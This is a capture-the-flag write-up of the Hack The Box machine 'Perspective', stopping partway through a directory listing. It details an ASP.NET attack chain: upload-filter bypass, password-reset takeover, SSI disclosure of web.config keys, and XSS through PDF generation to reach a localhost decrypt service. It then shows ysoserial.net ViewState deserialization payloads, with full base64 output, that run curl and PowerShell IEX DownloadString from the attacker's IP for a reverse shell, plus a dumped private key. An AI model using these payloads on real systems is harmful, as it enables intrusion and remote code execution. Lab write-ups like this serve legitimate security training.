HTB Perspective

August 28, 2022 17-minute read

ctf • windows • .net • custom • XSS • SSI

0x00 recon Link to heading

1

sudo nmap -sC -sV perspctive.htb

Not much, let’s check port 80 as usual..

Login page and register page. Login as admin@perspective.htb with admin password didn’t give us anything.. Nothing interesting in the code on this page either.. maybe xss ? I’ve also tried to register a new account

Let’s login

1
2


sngk@thrunter.si
thrunt1ngA11TheWay

Some new pages.. seems we can upload a file?

and just saw an admin email there for contacts.. maybe we need to find the password for admin?

Burp Link to heading

file upload Link to heading

Let’s try to login again and intercept the request with burp. I tried to upload file and it said that only JPEG is accepted..

try to upload jpeg then… What if we modify another Content-Type field (in the header).

Let’s try to make it “think” it is JPEG. if we change it to image/jpeg we got the following error

Hold on, there is another Content-Type field that we can change to image/jpeg

it worked..

Good, maybe we’ll need to upload some specific file there… let’s investigate the rest of the website

0x01 admin panel Link to heading

website admin user Link to heading

So we enter our user’s email sngk@thrunter.si then change it in Burp to admin@perspective.htb and send to repeater..

Ok, well.. what if we do the same but on the next screen ?

lol wut? :D

Ok, it’s time to do the same but for real now.

and then forward it..

hmm… so it allowed but not really.. The request has an email ID, __VIEWSTATE and a __VIEWSTATEGENERATOR.Well, we aren’t asked any security questions. Does that mean we can keep the security questions empty? We keep this questions field empty. We again use our test account and Initiate a password reset. And change the hidden email ID.

Forward, forward and…. change the password lol

1
2


admin@perspective.htb
p@$Sword1

Let’s login as admin now… New “admin” page - new product admin panel

it seems we can generate pdf for the user?

Ok that’s something…now need to figure out what can we upload.. given it’s an ASP.NET app… gottagooglemore

0x02 SSI injection ? Link to heading

We can upload Image, a Product Name, a Description, and a Suggested Price. We can try for SSI, XSS, and Insecure File Upload.

SSI Link to heading

Let’s try to upload a few files using extensions like shtml, aspx, html. I’ve tried js and python before and it didn’t work.. will try shtml next i guess.

Shtml Link to heading

create a simple SHTML file and try to upload it to the server; by changing the content-type to image/jpeg file content:

1

<!--#include file="web.config"-->

Successfully uploaded, let’s check the file content by viewing the source:

 1<?xml version="1.0" encoding="UTF-8"?>
 2<configuration>
 3    <system.webServer>
 4        <handlers>
 5            <clear />
 6      <add name="SSINC-html" path="*.shtml" verb="*" modules="ServerSideIncludeModule" resourceType="File" />
 7      <add name="StaticFile" path="*" verb="*" modules="StaticFileModule,DefaultDocumentModule,DirectoryListingModule" resourceType="Either" requireAccess="Read" />
 8        </handlers>
 9    </system.webServer>
10    <appSettings>
11        <add key="allowSubDirConfig" value="false" />
12    </appSettings>
13</configuration>

okay, it is allowed. iirc, there should be a config file in webapp root dir and in www, so maybe worth trying to upload shtml again but with a little twist.

File content:

1<!--#include file="../web.config"-->

Let’s check the content again.. http://perspective.htb/Images/ssi2_38139402724.shtml - view source

  1<?xml version="1.0" encoding="utf-8"?>
  2<configuration>
  3  <configSections>
  4    <section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" requirePermission="false" />
  5  </configSections>
  6  <connectionStrings>
  7    <add name="localMssql" connectionString="Data Source=PERSPECTIVE\SQLEXPRESS;database=perspective;Integrated Security=True;Persist Security Info=False;Pooling=False;MultipleActiveResultSets=False;Encrypt=False;TrustServerCertificate=False" providerName="System.Data.SqlClient" />
  8  </connectionStrings>
  9  <system.web>
 10    <sessionState cookieless="false" mode="InProc" />
 11    <roleManager enabled="true" defaultProvider="SqlRoleProvider">
 12      <providers>
 13        <add name="SqlRoleProvider" type="System.Web.Security.SqlRoleProvider" connectionStringName="localMssql" applicationName="/" />
 14      </providers>
 15    </roleManager>
 16    <compilation debug="true" targetFramework="4.6.1" />
 17    <httpRuntime targetFramework="4.6.1" />
 18    <authentication mode="Forms">
 19      <forms name=".ASPXAUTH" cookieless="UseDeviceProfile" loginUrl="~/Account/Login.aspx" slidingExpiration="false" protection="All" requireSSL="false" timeout="10" path="/" />
 20    </authentication>
 21    <machineKey compatibilityMode="Framework20SP2" validation="SHA1" decryption="AES" validationKey="99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF" decryptionKey="B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9" />
 22    <pages>
 23      <namespaces>
 24        <add namespace="System.Web.Optimization" />
 25      </namespaces>
 26      <controls>
 27        <add assembly="Microsoft.AspNet.Web.Optimization.WebForms" namespace="Microsoft.AspNet.Web.Optimization.WebForms" tagPrefix="webopt" />
 28      </controls>
 29    </pages>
 30    <membership defaultProvider="SqlProvider" userIsOnlineTimeWindow="15">
 31      <providers>
 32        <add name="SqlProvider" type="System.Web.Security.SqlMembershipProvider" connectionStringName="localMssql" applicationName="/" enablePasswordRetrieval="false" enablePasswordReset="true" requiresQuestionAndAnswer="false" requiresUniqueEmail="false" passwordFormat="Hashed" maxInvalidPasswordAttempts="5" passwordAttemptWindow="10" />
 33      </providers>
 34    </membership>
 35    <profile>
 36      <providers>
 37        <clear />
 38        <add name="AspNetSqlProfileProvider" type="System.Web.Profile.SqlProfileProvider" connectionStringName="localMssql" applicationName="/" />
 39      </providers>
 40      <properties>
 41        <add name="Question1" />
 42        <add name="Answer1" />
 43        <add name="Question2" />
 44        <add name="Answer2" />
 45        <add name="Question3" />
 46        <add name="Answer3" />
 47      </properties>
 48    </profile>
 49    <customErrors mode="On">
 50      <error redirect="http://perspective.htb/500.html" statusCode="500" />
 51    </customErrors>
 52  </system.web>
 53  <runtime>
 54    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
 55      <dependentAssembly>
 56        <assemblyIdentity name="Antlr3.Runtime" publicKeyToken="eb42632606e9261f" />
 57        <bindingRedirect oldVersion="0.0.0.0-3.5.0.2" newVersion="3.5.0.2" />
 58      </dependentAssembly>
 59      <dependentAssembly>
 60        <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" />
 61        <bindingRedirect oldVersion="0.0.0.0-12.0.0.0" newVersion="12.0.0.0" />
 62      </dependentAssembly>
 63      <dependentAssembly>
 64        <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" />
 65        <bindingRedirect oldVersion="0.0.0.0-4.0.2.1" newVersion="4.0.2.1" />
 66      </dependentAssembly>
 67      <dependentAssembly>
 68        <assemblyIdentity name="WebGrease" publicKeyToken="31bf3856ad364e35" />
 69        <bindingRedirect oldVersion="0.0.0.0-1.6.5135.21930" newVersion="1.6.5135.21930" />
 70      </dependentAssembly>
 71      <dependentAssembly>
 72        <assemblyIdentity name="EntityFramework" publicKeyToken="b77a5c561934e089" />
 73        <bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
 74      </dependentAssembly>
 75      <dependentAssembly>
 76        <assemblyIdentity name="System.Web.Helpers" publicKeyToken="31bf3856ad364e35" />
 77        <bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" />
 78      </dependentAssembly>
 79      <dependentAssembly>
 80        <assemblyIdentity name="System.Web.WebPages" publicKeyToken="31bf3856ad364e35" />
 81        <bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" />
 82      </dependentAssembly>
 83      <dependentAssembly>
 84        <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />
 85        <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />
 86      </dependentAssembly>
 87      <dependentAssembly>
 88        <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />
 89        <bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />
 90      </dependentAssembly>
 91    </assemblyBinding>
 92  </runtime>
 93  <system.webServer>
 94    <handlers>
 95      <add name="HTMLHandler" type="System.Web.StaticFileHandler" path="*.html" verb="GET" />
 96      <add name="SSINC-html" path="*.shtml" verb="*" modules="ServerSideIncludeModule" resourceType="File" />
 97    </handlers>
 98        <httpErrors errorMode="Custom" />
 99  </system.webServer>
100  <system.net></system.net>
101  <system.data></system.data>
102  <appSettings>
103    <add key="environment" value="Production" />
104    <add key="Domain" value="perspective.htb" />
105    <add key="ViewStateUserKey" value="ENC1:3UVxtz9jwPJWRvjdl1PfqXZTgg==" />
106    <add key="SecurePasswordServiceUrl" value="http://localhost:8000" />
107  </appSettings>
108</configuration>
109<!--ProjectGuid: 32B06320-D9FA-44B2-A1EA-B2547531A4A2-->

The most interesting part is down the bottom

So we now have everything to modify __VIEWSTATE except for… the main fucking thing, the ViewStateUserKey because it’s encrypted and the vaule is stored somewhere on localhost:8000.. well, it would’ve not been an insane box then, right? Try to find a XSS then?

0x03 XSS Link to heading

Given we can generate PDF as admin, it might actually be possible to execute the XSS payload, need to find the payload first tho. At least it is safe to assume it would be one of the fields we can write to (i.e. description, name, price). Gotta use Burp’s Intruder with the following list: https://raw.githubusercontent.com/payloadbox/xss-payload-list/master/Intruder/xss-payload-list.txt

Burp intruder settings. Link to heading

positions:

payload:

It’s huge, so will take some time to find the proper XSS. We know that there is a malicious input error when something is not right. so we can add the filter for it to flag them

Got bunch of XSS but which ones can bypass the WAF?

I’ve tried img and meta since they were quite promising. It appears that img was blocked by the WAF, when I tried to generate the PDF to execute the payload - got this error.

but meta wasn’t:

1<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

so we can now try to grab something from our attacker machine by modifying the above code as following:

1<META HTTP-EQUIV="refresh" CONTENT="0;url=http://10.10.14.12/test.html">

test html looks like this:

Go to the admin panel and generate a pdf. And we can see the file has been downloaded from our machine.

and executed when we genereated the pdf

Now we need to grab the file from localhost:8000 .. apparently, iframe should work as it can parse/render the code of another website. let’s give it a shot. https://www.w3schools.com/tags/tag_iframe.ASP create a ifrm.html that contains the following:

1Hello world
2<iframe src="http://localhost:8000/" width="100%" height="300" style="border:1px solid black;">
3</iframe>

gernerate pdf again and open it.

seems we need to specify a bigger “height” value.. and ther is a file /swagger/v1/swagger.json maybe we should try to extract it as well? first, exapnd the height

1Hello world
2<iframe src="http://localhost:8000/" width="100%" height="5500" style="border:1px solid black;">
3</iframe>

It worked, but the box died - no screenshot for this one. will restrat the box and try again with requesting json file. there was another field:

POST /decrypt It seems we have to send a POST request to decrypt the state key, but maybe there is more info in json file. Will check..

json file Link to heading

1Hello world
2<iframe src="http://localhost:8000/swagger/v1/swagger.json" width="100%" height="5500" style="border:1px solid black;">
3</iframe>

we got the json. good

 1{
 2   "openapi":"3.0.1",
 3   "info":{
 4      "title":"AdminAPI",
 5      "version":"v1"
 6   },
 7   "paths":{
 8      "/encrypt":{
 9         "get":{
10            "tags":[
11               "SecurePasswordService"
12            ],
13            "parameters":[
14               {
15                  "name":"plaintext",
16                  "in":"query",
17                  "schema":{
18                     "type":"string",
19                     "nullable":true
20                  }
21               }
22            ],
23            "responses":{
24               "200":{
25                  "description":"Success",
26                  "content":{
27                     "text/plain":{
28                        "schema":{
29                           "type":"string"
30                        }
31                     },
32                     "application/json":{
33                        "schema":{
34                           "type":"string"
35                        }
36                     },
37                     "text/json":{
38                        "schema":{
39                           "type":"string"
40                        }
41                     }
42                  }
43               }
44            }
45         }
46      },
47      "/decrypt":{
48         "post":{
49            "tags":[
50               "SecurePasswordService"
51            ],
52            "parameters":[
53               {
54                  "name":"cipherTextRaw",
55                  "in":"query",
56                  "schema":{
57                     "type":"string",
58                     "nullable":true
59                  }
60               }
61            ],
62            "responses":{
63               "200":{
64                  "description":"Success",
65                  "content":{
66                     "text/plain":{
67                        "schema":{
68                           "type":"string"
69                        }
70                     },
71                     "application/json":{
72                        "schema":{
73                           "type":"string"
74                        }
75                     },
76                     "text/json":{
77                        "schema":{
78                           "type":"string"
79                        }
80                     }
81                  }
82               }
83            }
84         }
85      }
86   },
87   "components":{
88      
89   }
90}

We are looking for the /decrypt part..We have to send the POST reqeuest. Hence, <iframe> won’t work anymore but we can send stuff to iframe. It also takes cipherTextRaw as a parameter and decrypts the data. so, the link we need to post should be as following (make sure to URI encode it): "http://localhost:8000/decrypt?cipherTextRaw=ENC1%3a3UVxtz9jwPJWRvjdl1PfqXZTgg%3d%3d" and we send it to iframe, quick google on "how to post to iframe" get us this: [Post data to an iframe] ( https://css-tricks.com/snippets/html/post-data-to-an-iframe/) We then have to submit our form and again google delivers: Submit form

let’s write a code first for our “test.html” file

 1<html>
 2<body>
 3Hello world
 4<p><br></p>
 5<form id="test" target="iframe"
 6      method="post" action="http://localhost:8000/decrypt?cipherTextRaw=ENC1%3a3UVxtz9jwPJWRvjdl1PfqXZTgg%3d%3d" >
 7    <input type="text">
 8</form>
 9<iframe name="iframe"></iframe>
10<script type="text/javascript">
11    document.getElementById('test').submit();
12</script>
13</body>
14</html>

here we go, the decypted key for the VIEWSTATE:

0x04 .NET exploiting __VIEWSTATE Link to heading

So far, we know a few things: key SAltysAltYV1ewSTaT3 .NET v 4.6.1 validation=“SHA1” decryption=“AES” validationKey=“99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF” decryptionKey=“B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9” _VIEWSTATEGENERATOR: 0414C274

ysoserial.net Link to heading

https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret

it’s time for ysoserial.net tool again. based on the article above:

1.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --generator=93D20A1B --validationalg="SHA1" --validationkey="" --validationkey=""

We should be able to craft the payload and try to reach our machine:

1.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "curl http://10.10.14.12/test.txt -o C:/Temp" --generator=0414C274 --validationalg="SHA1" --viewstateuserkey="SAltysAltYV1ewSTaT3" --validationkey="99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF"

the output:

it’s URL encoded and we need to send it as is. Hence, using the URL decoder on it, will give us a proper payload. Now we need to create another product and subtitude the viewstate with our payload.

1/wEyuAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADaBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi0xNiI/Pg0KPE9iamVjdERhdGFQcm92aWRlciBNZXRob2ROYW1lPSJTdGFydCIgSXNJbml0aWFsTG9hZEVuYWJsZWQ9IkZhbHNlIiB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIiB4bWxuczpzZD0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9U3lzdGVtIiB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCI+DQogIDxPYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQogICAgPHNkOlByb2Nlc3M+DQogICAgICA8c2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgICAgIDxzZDpQcm9jZXNzU3RhcnRJbmZvIEFyZ3VtZW50cz0iL2MgY3VybCBodHRwOi8vMTAuMTAuMTQuMTIvdGVzdC50eHQgLW8gQzovVGVtcCIgU3RhbmRhcmRFcnJvckVuY29kaW5nPSJ7eDpOdWxsfSIgU3RhbmRhcmRPdXRwdXRFbmNvZGluZz0ie3g6TnVsbH0iIFVzZXJOYW1lPSIiIFBhc3N3b3JkPSJ7eDpOdWxsfSIgRG9tYWluPSIiIExvYWRVc2VyUHJvZmlsZT0iRmFsc2UiIEZpbGVOYW1lPSJjbWQiIC8+DQogICAgICA8L3NkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgIDwvc2Q6UHJvY2Vzcz4NCiAgPC9PYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQo8L09iamVjdERhdGFQcm92aWRlcj4Lf7k2j92I+XrOfx2Fzrl6aipIM2k=

We successfully reached the machine and now can can create a reverse shell:

1.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.12/mini.ps1')" --generator=0414C274 --validationalg="SHA1" --viewstateuserkey="SAltysAltYV1ewSTaT3" --validationkey="99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF"

url decoded payload:

1/wEy6wcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAACNBjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi0xNiI/Pg0KPE9iamVjdERhdGFQcm92aWRlciBNZXRob2ROYW1lPSJTdGFydCIgSXNJbml0aWFsTG9hZEVuYWJsZWQ9IkZhbHNlIiB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIiB4bWxuczpzZD0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9U3lzdGVtIiB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCI+DQogIDxPYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQogICAgPHNkOlByb2Nlc3M+DQogICAgICA8c2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgICAgIDxzZDpQcm9jZXNzU3RhcnRJbmZvIEFyZ3VtZW50cz0iL2MgcG93ZXJzaGVsbCBJRVggKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTAuMTAuMTQuMTIvbWluaS5wczEnKSIgU3RhbmRhcmRFcnJvckVuY29kaW5nPSJ7eDpOdWxsfSIgU3RhbmRhcmRPdXRwdXRFbmNvZGluZz0ie3g6TnVsbH0iIFVzZXJOYW1lPSIiIFBhc3N3b3JkPSJ7eDpOdWxsfSIgRG9tYWluPSIiIExvYWRVc2VyUHJvZmlsZT0iRmFsc2UiIEZpbGVOYW1lPSJjbWQiIC8+DQogICAgICA8L3NkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgIDwvc2Q6UHJvY2Vzcz4NCiAgPC9PYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQo8L09iamVjdERhdGFQcm92aWRlcj4LvuZrxi9qHIGKHKc8k/8ekF3d7DA=

And we got the shell and user.txt :D

0x05 enum as webuser Link to heading

in the webuser root folder there is a few interesting files:

.ssh
userwebuserdesktop

id_rsa for the webuser Link to heading

ssh contains the following: dir .ssh

given there was a ssh port open, we might utilise the key, so let’s grab it first cat .ssh\id_rsa

 1-----BEGIN RSA PRIVATE KEY-----
 2MIIEpAIBAAKCAQEAzfoQwqu9tIYiy694HbGmT+qw2b+kUTnEcqEOEXv5+vLcVqZ2
 3APlHTSDj4rSzv+tJoHQiRf3IyVpNNqGw8+wM+P3wdozY66BUPHqz6FpRHxcMT2Ss
 4Nk9J9hxTi2L3oBVR83F0abBWnOClOqjrd8SMVRcyCi1/svSdOP8OPh9s+mpa5TG2
 5KEiI66whlBKKC1N2szF4rQNtkCGUw66zheHSxK5j6axjiP0sstC6hUJy2uqu3DXK
 60dOtwMUk5EOpkFPTZxlIzgbUI/CcQ8ipaankvrHrh8x8DKdv9KspzKhLflS5Ayie
 73PyFQ5lg9TCLk4dzyeB8YkBkBEXUbCePvNBFRwIDAQABAoIBAFwtqeyE0TwFv3Kq
 8DzYyt3wSSpzYD+At2wV1oAchFWlB4GuCyVJ8PHV+350oQz0DPgrpjiEGhyHdIKrv
 9R3KR0+hmNIPJWpZwROJgAz1blew081RgeFVBvJbAbH73hlwEzo0E3BUkTk6cljUf
10PWl281ptK/60B+79W5MTSbtxcuLJgcvB/REYU3GPUK/dTSVU7IMV2hBrFP6srlqT
11aGZ2ugm6xNV14Iq0KOpuHfYXXSdkklOt+eSZ8AWTQTkZtSfLJUybOaLYStOGn35S
12IupwD4kxZbAtX54Avdi8rq61H4TIrM82B2+UpPkdd2P6am822mlQa4lVrnJCbq88
13z6Xv6ckCgYEA9+lwddycXp0A4WlhmIu5A1440uZELhAfeRlBQVpeqlF0Ig2XjUyb
14WhEu+lMlEfbsiWK/rfIp53uuBkstXc2ImKfhSbys8KMkJKq6Fp+OjbbFYSIS9mSP
15f91W658OtfoNG/UHPp74f6/mogsbKpNP0nPDnjFBQLMuL2pYO/Q7p2sCgYEA1LJi
16bPM/rpbzyGjJSYd50xNP1ftaUyZwRWCWAgAWLXKVVbuNdPNy6GvjyaNkJcPz3dh+
17zSsLZeSyyVWUvFQslkkZaMvWZVDdwh9x8i3N/NhhTbqVTyBBqWTyk0l0WJVcHtUb
18q6kSIYucmw/zH9qlpfYHvMWZN2kSHq+kwlMAfJUCgYBmTSpfOJ4+XMOUQQxJCr9a
19KHOCdAsGhxi1vDo1YblWxy4JL1qusEIbNKQSIGVXuHF7cAhxG1E3eM4jQrqBzuLj
20O8O3zef/lRLBHsKTu1v0Fsv0fT8d9flRZmEL8iL77SejtcU7jhY1erzNeY/ITenO
21in7atLCcplQUtOmcM/i56QKBgQDRjiMNBqfSYqUy6ZKPoCt1u4wn3eoDDFcG8383
2230/6XO8mtY9MD2NB/LJDgnh0ANiu1NMxXtxu+mDvniLZXfFD7CddqZ7E2WRzEroY
23Cert114ez9q1R6mJtIyOcotvj1BgjEQj34KejEeyOoel9azIk1rSMLig8CNLGnAw
24iMhs9QKBgQC6pv2GxsrQmUEPiE0vorFtMulMi7vRYe7kfgsohE8grqKzsveLQJok
25R+67L9QcuLwo2OWng2d2oEFkx9dx++ewEluo8ZjcOx3TVDIIZDUw4KdD0Q/josqp
26RhZbZ6EF094JTnINnexb9OhQMwQJHAhp63o5dH6fFXSTUpW10u+mkA==
27-----END RSA PRIVATE KEY-----

Create webuser_id with the key above and give it proper permissions.

1

sudo chmod 600 webuser_id

checking other ports Link to heading

netstat -ano

It appears ports 8000 and 8009 can’t be accessed because of WAF, but we should be able to portforward it via ssh and investigate the webapp.

1

ssh -i webuser_id webuser@perspective.htb -L 8009:127.0.0.1:8009

let’s go to the 127.0.0.1:8009 address and see what’s there.

well.. it’s the same website, except that it says “staging”

let’s enumerate more, maybe there is something else

checking WEBAPPS directory Link to heading

let’s dig into it…there is a staging webapp there, which appears to be the one on port 8009…that directory cotains the following:

  1webuser@PERSPECTIVE C:\>tree /f /a WEBAPPS\PartImages_Staging
  2Folder PATH listing 
  3Volume serial number is F4F6-CEE3
  4C:\WEBAPPS\PARTIMAGES_STAGING
  5|   500.html
  6|   About.aspx
  7|   Bundle.config
  8|   Default.aspx
  9|   favicon.ico
 10|   Global.asax
 11|   Site.Master
 12|   web.config
 13|
 14+---Account
 15|       Forgot.aspx
 16|       Login.aspx
 17|       Register.aspx
 18|
 19+---Admin
 20|       AdminHome.aspx
 21|       AdminProducts.aspx
 22|       Web.config
 23|
 24+---bin
 25|   |   Antlr3.Runtime.dll
 26|   |   Antlr3.Runtime.pdb
 27|   |   AspNet.ScriptManager.bootstrap.dll
 28|   |   AspNet.ScriptManager.jQuery.dll
 29|   |   BouncyCastle.Crypto.dll
 30|   |   Google.Protobuf.dll
 31|   |   Google.Protobuf.pdb
 32|   |   ICSharpCode.SharpZipLib.dll
 33|   |   ICSharpCode.SharpZipLib.pdb
 34|   |   K4os.Compression.LZ4.dll
 35|   |   K4os.Compression.LZ4.Streams.dll
 36|   |   K4os.Hash.xxHash.dll
 37|   |   Microsoft.AspNet.FriendlyUrls.dll
 38|   |   Microsoft.AspNet.Web.Optimization.WebForms.dll
 39|   |   Microsoft.AspNetCore.WebUtilities.dll
 40|   |   Microsoft.Bcl.AsyncInterfaces.dll
 41|   |   Microsoft.CodeDom.Providers.DotNetCompilerPlatform.dll
 42|   |   Microsoft.Extensions.DependencyInjection.Abstractions.dll
 43|   |   Microsoft.Extensions.Logging.Abstractions.dll
 44|   |   Microsoft.Extensions.Logging.dll
 45|   |   Microsoft.Extensions.Options.dll
 46|   |   Microsoft.Extensions.Primitives.dll
 47|   |   Microsoft.Net.Http.Headers.dll
 48|   |   Microsoft.ScriptManager.MSAjax.dll
 49|   |   Microsoft.ScriptManager.WebForms.dll
 50|   |   Microsoft.Web.Infrastructure.dll
 51|   |   Newtonsoft.Json.dll
 52|   |   perspective.dll
 53|   |   perspective.dll.original
 54|   |   PuppeteerSharp.dll
 55|   |   System.Buffers.dll
 56|   |   System.Memory.dll
 57|   |   System.Numerics.Vectors.dll
 58|   |   System.Runtime.CompilerServices.Unsafe.dll
 59|   |   System.Text.Encodings.Web.dll
 60|   |   System.Threading.Tasks.Extensions.dll
 61|   |   System.Web.Helpers.dll
 62|   |   System.Web.Optimization.dll
 63|   |   System.Web.Razor.dll
 64|   |   System.Web.WebPages.Deployment.dll
 65|   |   System.Web.WebPages.dll
 66|   |   System.Web.WebPages.Razor.dll
 67|   |   Ubiety.Dns.Core.dll
 68|   |   WebGrease.dll
 69|   |   WebMatrix.Data.dll
 70|   |   WebMatrix.WebData.dll
 71|   |   Zstandard.Net.dll
 72|   |
 73|   \---roslyn
 74|           csc.exe
 75|           csc.exe.config
 76|           csc.rsp
 77|           csi.exe
 78|           csi.exe.config
 79|           csi.rsp
 80|           Microsoft.Build.Tasks.CodeAnalysis.dll
 81|           Microsoft.CodeAnalysis.CSharp.dll
 82|           Microsoft.CodeAnalysis.CSharp.Scripting.dll
 83|           Microsoft.CodeAnalysis.dll
 84|           Microsoft.CodeAnalysis.Scripting.dll 
 85|           Microsoft.CodeAnalysis.VisualBasic.dll
 86|           Microsoft.CSharp.Core.targets
 87|           Microsoft.DiaSymReader.Native.amd64.dll
 88|           Microsoft.DiaSymReader.Native.x86.dll
 89|           Microsoft.Managed.Core.targets
 90|           Microsoft.VisualBasic.Core.targets
 91|           Microsoft.Win32.Primitives.dll
 92|           System.AppContext.dll
 93|           System.Collections.Immutable.dll
 94|           System.Console.dll
 95|           System.Diagnostics.DiagnosticSource.dll
 96|           System.Diagnostics.FileVersionInfo.dll
 97|           System.Diagnostics.StackTrace.dll
 98|           System.Globalization.Calendars.dll
 99|           System.IO.Compression.dll
100|           System.IO.Compression.ZipFile.dll
101|           System.IO.FileSystem.dll
102|           System.IO.FileSystem.Primitives.dll
103|           System.Net.Http.dll
104|           System.Net.Sockets.dll
105|           System.Reflection.Metadata.dll
106|           System.Runtime.InteropServices.RuntimeInformation.dll
107|           System.Security.Cryptography.Algorithms.dll
108|           System.Security.Cryptography.Encoding.dll
109|           System.Security.Cryptography.Primitives.dll
110|           System.Security.Cryptography.X509Certificates.dll
111|           System.Text.Encoding.CodePages.dll
112|           System.Threading.Tasks.Extensions.dll
113|           System.ValueTuple.dll
114|           System.Xml.ReaderWriter.dll
115|           System.Xml.XmlDocument.dll
116|           System.Xml.XPath.dll
117|           System.Xml.XPath.XDocument.dll
118|           vbc.exe
119|           vbc.exe.config
120|           vbc.rsp
121|           VBCSCompiler.exe
122|           VBCSCompiler.exe.config
123|
124+---Contact
125|       Contact.aspx
126|       Web.config
127|
128+---Content
129|       bootstrap-theme.css
130|       bootstrap-theme.css.map
131|       bootstrap-theme.min.css
132|       bootstrap-theme.min.css.map
133|       bootstrap.css
134|       bootstrap.css.map
135|       bootstrap.min.css
136|       bootstrap.min.css.map
137|       sb-admin-2.css
138|       sb-admin-2.min.css
139|       Site.css
140|       theme.css
141|
142+---fonts
143|       glyphicons-halflings-regular.eot
144|       glyphicons-halflings-regular.svg
145|       glyphicons-halflings-regular.ttf
146|       glyphicons-halflings-regular.woff
147|       glyphicons-halflings-regular.woff2
148|
149+---handlers
150|       adminPrintable.ashx
151|       changePassword.ashx
152|
153+---Images
154|       Web.config
155|
156+---Products
157|       NewProduct.aspx
158|       ProductList.aspx
159|       Web.config
160|
161+---Scripts
162|   |   bootstrap.js
163|   |   bootstrap.min.js
164|   |   jquery-3.4.1.js
165|   |   jquery-3.4.1.min.js
166|   |   jquery-3.4.1.min.map
167|   |   jquery-3.4.1.slim.js
168|   |   jquery-3.4.1.slim.min.js
169|   |   jquery-3.4.1.slim.min.map
170|   |   modernizr-2.8.3.js
171|   |
172|   \---WebForms
173|       |   DetailsView.js
174|       |   Focus.js
